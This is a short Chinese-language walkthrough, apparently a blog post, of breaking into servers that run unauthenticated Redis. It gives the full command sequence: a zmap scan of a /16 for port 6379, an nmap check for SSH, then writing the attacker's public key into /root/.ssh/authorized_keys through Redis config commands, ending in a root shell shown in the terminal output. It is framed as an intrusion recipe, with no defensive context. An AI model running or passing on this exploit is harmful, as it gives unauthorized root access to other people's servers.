先上 zmap 這個大殺器大範圍找安裝 redis 服務的機器,aaa.bbb.0.0 是計劃掃描的網絡。redis
$ zmap -B 1M -p 6379 aaa.bbb.0.0/16 -o results.csv
而後根據 results.csv 的結果來逐個排查,注意要能 ssh 登陸的。網絡
$ cat results.csv | xargs nmap -p 22
最後找一個隱蔽環境,開始幹活,aaa.bbb.ccc.ddd 是目標地址:dom
root@ab871b39330f:~# ssh-keygen -t rsa Generating public/private rsa key pair. Enter file in which to save the key (/root/.ssh/id_rsa): Created directory '/root/.ssh'. Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in /root/.ssh/id_rsa. Your public key has been saved in /root/.ssh/id_rsa.pub. The key fingerprint is: f8:d1:b2:bc:d9:13:13:3d:de:6d:6e:27:bf:28:28:72 root@ab871b39330f The key's randomart image is: +---[RSA 2048]----+ | | | | | . | | . .. o | | . S .o o . | | o +o . . o| | + .o o | | . E =.. o +| | o + .... =+| +-----------------+ root@ab871b39330f:~# (echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") | redis-cli -h aaa.bbb.ccc.ddd -x set crackit OK root@ab871b39330f:~# redis-cli -h aaa.bbb.ccc.ddd aaa.bbb.ccc.ddd:6379> config set dir /root/.ssh/ OK aaa.bbb.ccc.ddd:6379> config get dir 1) "dir" 2) "/root/.ssh" aaa.bbb.ccc.ddd:6379> config set dbfilename "authorized_keys" OK aaa.bbb.ccc.ddd:6379> save OK aaa.bbb.ccc.ddd:6379> exit root@ab871b39330f:~# ssh root@aaa.bbb.ccc.ddd The authenticity of host 'aaa.bbb.ccc.ddd (aaa.bbb.ccc.ddd)' can't be established. RSA key fingerprint is 0c:9d:60:e6:24:51:07:4d:93:0f:f3:4e:cb:12:ae:43. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added 'aaa.bbb.ccc.ddd' (RSA) to the list of known hosts. Last login: Tue Sep 29 15:20:10 2015 from 202.115.16.136 [root@mscopyright1 ~]# pwd /root